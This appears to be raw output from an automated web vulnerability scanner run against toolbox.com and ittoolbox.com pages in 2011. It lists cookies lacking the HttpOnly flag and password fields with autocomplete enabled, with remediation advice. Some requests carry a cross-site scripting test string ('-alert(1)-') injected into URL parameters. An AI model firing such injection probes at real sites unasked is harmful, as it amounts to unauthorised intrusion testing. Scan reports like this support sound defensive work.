Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 81197
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:12 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Why Should ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home/register?trksubprod=joinnow_stationary&opi_t=Future+States&opi_u=http%3a%2f%2fit.toolbox.com%2fblogs%2fppmtoday%3f306f2'-alert(1)-'2382eb5920b%3d1&opi_o=5 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39817
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: joinedfrom=title=Future States&url=http://it.toolbox.com/blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=1&origin=5; domain=.toolbox.com; expires=Wed, 09-Feb-2011 14:47:17 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:16 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Register wi ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jobs/ HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40888
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:47:48 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:48 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Jobs </tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /trd/885101 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 223
Content-Type: text/html; charset=utf-8
Location: http://windows.ittoolbox.com/research/windows-7-deployment-an-insiders-guide-23009?r=OnlinePostingReminder
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR IND UNI"
Set-Cookie: EREF=dest=http%3a%2f%2fwindows.ittoolbox.com%2fresearch%2fwindows-7-deployment-an-insiders-guide-23009%3fr%3dOnlinePostingReminder&source=&rid=885101; domain=.toolbox.com; expires=Mon, 26-Jan-2015 14:46:39 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:38 GMT
Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://windows.ittoolbox.com/research/windows-7-deployment-an-insiders-guide-23009?r=OnlinePostingReminder">here</a>. ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
IBC1132967913=940@2@696567@153413@20110126095544@173.193.214.243;path=/sc/;expires=Monday, 25 July 2011 09:55:44 GMT;domain=IndustryBrains.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click?sid=940&rqctid=6475&pos=1&lid=696567&cid=153413&pr=2&tstamp=20110126094929&iip=173.193.214.243&ltype=JSCR&lname=560x350v1&url=http://www.netapp.com/us/solutions/infrastructure/virtualization/guarantee.html HTTP/1.1
Host: links.industrybrains.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Object Moved
Connection: close
Date: Wed, 26 Jan 2011 14:55:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="CAO DSP COR CURa "
Location: http://www.netapp.com/us/solutions/infrastructure/virtualization/guarantee.html
Content-Type: text/html
Set-Cookie: IBC1132967913=940@2@696567@153413@20110126095544@173.193.214.243;path=/sc/;expires=Monday, 25 July 2011 09:55:44 GMT;domain=IndustryBrains.com;
The following cookie was issued by the application and does not have the HttpOnly flag set:
s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; Expires=Mon, 25 Jan 2016 14:49:31 GMT; Domain=.toolbox.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/ittoolglobalit,ittoolitcio,ittoolglobal/1/H.17/s44680976476520?AQB=1&ndh=1&t=26/0/2011%208%3A49%3A50%203%20360&vmt=4A284D57&ns=ittoolbox&pageName=IT%3AIT%20Management%3Ablogs%3Appmtoday%3AFuture%20States&g=http%3A//it.toolbox.com/blogs/ppmtoday%3F306f2%27-alert%281%29-%272382eb5920b%3D1&cc=USD&ch=blogs&events=event2&h1=IT%2CIT%20Management%2Cblogs%2Cppmtoday&h2=blogs%2CIT%2CIT%20Management&c3=Unrecognized&v3=Unrecognized&c5=IT&v5=IT&c6=IT%20Management&v6=IT%20Management&c7=blogs&v7=blogs&v10=IT%3AIT%20Management%3Ablogs%3Appmtoday%3AFuture%20States&c11=7%3A30AM&v11=7%3A30AM&c12=Wednesday&v12=Wednesday&c13=Weekday&v13=Weekday&v20=blogs&v26=blogs&c27=blogs%3Appmtoday&v27=blogs%3Appmtoday&c28=blogs%3Appmtoday&v28=blogs%3Appmtoday&c29=blogs%3Appmtoday&v29=blogs%3Appmtoday&c37=blogs%3AUnrecognized&c40=32&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.toolbox.com
Proxy-Connection: keep-alive
Referer: http://it.toolbox.com/blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true
Response
HTTP/1.1 302 Found
Date: Wed, 26 Jan 2011 14:49:31 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; Expires=Mon, 25 Jan 2016 14:49:31 GMT; Domain=.toolbox.com; Path=/
Location: http://metrics.toolbox.com/b/ss/ittoolglobalit,ittoolitcio,ittoolglobal/1/H.17/s44680976476520?AQB=1&pccr=true&vidn=26A01A3D851D2B4A-60000137A054F13C&&ndh=1&t=26/0/2011%208%3A49%3A50%203%20360&vmt=4A284D57&ns=ittoolbox&pageName=IT%3AIT%20Management%3Ablogs%3Appmtoday%3AFuture%20States&g=http%3A//it.toolbox.com/blogs/ppmtoday%3F306f2%27-alert%281%29-%272382eb5920b%3D1&cc=USD&ch=blogs&events=event2&h1=IT%2CIT%20Management%2Cblogs%2Cppmtoday&h2=blogs%2CIT%2CIT%20Management&c3=Unrecognized&v3=Unrecognized&c5=IT&v5=IT&c6=IT%20Management&v6=IT%20Management&c7=blogs&v7=blogs&v10=IT%3AIT%20Management%3Ablogs%3Appmtoday%3AFuture%20States&c11=7%3A30AM&v11=7%3A30AM&c12=Wednesday&v12=Wednesday&c13=Weekday&v13=Weekday&v20=blogs&v26=blogs&c27=blogs%3Appmtoday&v27=blogs%3Appmtoday&c28=blogs%3Appmtoday&v28=blogs%3Appmtoday&c29=blogs%3Appmtoday&v29=blogs%3Appmtoday&c37=blogs%3AUnrecognized&c40=32&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.3.1
Expires: Tue, 25 Jan 2011 14:49:31 GMT
Last-Modified: Thu, 27 Jan 2011 14:49:31 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www389
Content-Length: 0
Content-Type: text/plain
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/TLBXittoolbox/technology/1%7BTIME_DATE_STAMP%7D@Top1 HTTP/1.1
Host: oasc05134.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://it.toolbox.com/blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl
Response
HTTP/1.1 200 OK
Date: Wed, 26 Jan 2011 14:49:29 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 451
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The following cookie was issued by the application and does not have the HttpOnly flag set:
lsd=4TIUB; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pages/Toolboxcom/117012708708 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=ODZATe8iFsKm4n_Xjpn2xOrf; expires=Fri, 25-Jan-2013 14:56:56 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=4TIUB; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 26 Jan 2011 14:56:57 GMT
Content-Length: 154510
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
cae_browser=desktop; path=/; domain=.netapp.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /us/solutions/infrastructure/virtualization/guarantee.html HTTP/1.1
Host: www.netapp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 26 Jan 2011 14:55:02 GMT
X-Server-Name: dv-c1-r1-u14-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 26 Jan 2011 14:57:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cae_browser=desktop; path=/; domain=.netapp.com
Content-Length: 104728
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 301 Moved Permanently
Server: Omniture AWS/2.0.0
Location: http://www.omniture.com/en/
Content-Length: 313
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Wed, 26 Jan 2011 14:57:08 GMT
Connection: close
Set-Cookie: BIGipServerhttp_omniture=101320202.5892.0000; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.omniture.com ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cringely/pulpit/ HTTP/1.1
Host: www.pbs.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Wed, 26 Jan 2011 14:57:09 GMT
Server: Apache/2.2.17 (Unix)
Set-Cookie: www.apache.sid=a407b02ae7db3726c0e6bb20994d70e7; path=/; domain=.pbs.org
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 33427
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.o ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /features/ HTTP/1.1
Host: www.spiceworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Wed, 26 Jan 2011 14:57:12 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: swcls=173.193.214.243.1296053832148878; path=/; domain=.spiceworks.com
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20485
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1
Host: businessintelligence.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79300
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=lgzfjg45p5p4ttjbryycmjiv; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:17 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Business In ...[SNIP]... </div> <form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm"> <div> ...[SNIP]... <div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="<% =btnSignIn.ClientID %>" /></div> ...[SNIP]...
The page contains a form with the following action URL:
http://cio.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 70865
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ev3vw13ts4uun2552nfwiz45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:19 GMT
Connection: close
The page contains a form with the following action URL:
http://cio.ittoolbox.com/blogs/
The form contains the following password field with autocomplete enabled:
ctl00$m$txtSignin_Password
Request
GET /blogs/ HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 85344
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=sthdbdnv4isdq155nf5krjic; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:21 GMT
Connection: close
The page contains a form with the following action URL:
http://cio.ittoolbox.com/directory/
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET /directory/ HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 52564
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=el0hjp55tk5oie55qdseux55; path=/; HttpOnly
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.ittoolbox.com; expires=Tue, 26-Apr-2011 13:49:31 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:34 GMT
Connection: close
The page contains a form with the following action URL:
http://cio.ittoolbox.com/documents/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET /documents/ HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28204
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=kqpydg55prajw345gnpd1jaz; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:29 GMT
Connection: close
The page contains a form with the following action URL:
http://cio.ittoolbox.com/events/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET /events/ HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38997
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=uu0vpmjgqupns155oiaxug55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:32 GMT
Connection: close
The page contains a form with the following action URL:
http://cio.ittoolbox.com/groups/Default.aspx
The form contains the following password field with autocomplete enabled:
ctl00$m$txtSignin_Password
Request
GET /groups/ HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 131235
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ttokbo25mimfaly03xopef55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:23 GMT
Connection: close
The page contains a form with the following action URL:
http://cio.ittoolbox.com/research/Default.aspx
The form contains the following password field with autocomplete enabled:
ctl00$m$txtSignin_Password
Request
GET /research/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 96466 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=mqlx3145uwj1pknllf1r5455; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:29 GMT Connection: close
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET /subscriptions/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 27989 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=vzkaha55kglahd45pvrgqp2s; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:33 GMT Connection: close
The page contains a form with the following action URL:
http://cloud.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: cloud.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 56007 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=edr0xeykfwnzlf55wgzg3zyo; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:35 GMT Connection: close
The page contains a form with the following action URL:
http://crm.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: crm.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 82725 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=2ge150zsf5orj4451zm2nlzm; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:39 GMT Connection: close
The page contains a form with the following action URL:
http://database.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: database.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 84329 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ra1d4q2rs54sn03stt4bip55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:38 GMT Connection: close
The page contains a form with the following action URL:
http://datacenter.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: datacenter.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 60090 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=wgr3vvq5eg30jq45klsivcfv; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:41 GMT Connection: close
The page contains a form with the following action URL:
http://datawarehouse.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: datawarehouse.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 72791 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ivrlt045uzzhvb45t5knzy55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:42 GMT Connection: close
The page contains a form with the following action URL:
http://eai.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: eai.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 71618 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=4d5wgz45zmrk1tj0f23ykr55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:42 GMT Connection: close
The page contains a form with the following action URL:
http://emergingtech.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: emergingtech.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 47575 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=vhyrxg55jlanffvxx24ekzek; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:43 GMT Connection: close
The page contains a form with the following action URL:
http://erp.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: erp.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 74629 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=11lky4ffifxs05zpvlu4qv55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:46 GMT Connection: close
The page contains a form with the following action URL:
http://finance.toolbox.com/default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: finance.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
